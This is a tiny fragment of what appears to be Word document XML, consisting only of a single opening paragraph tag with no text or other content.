     <w:p>
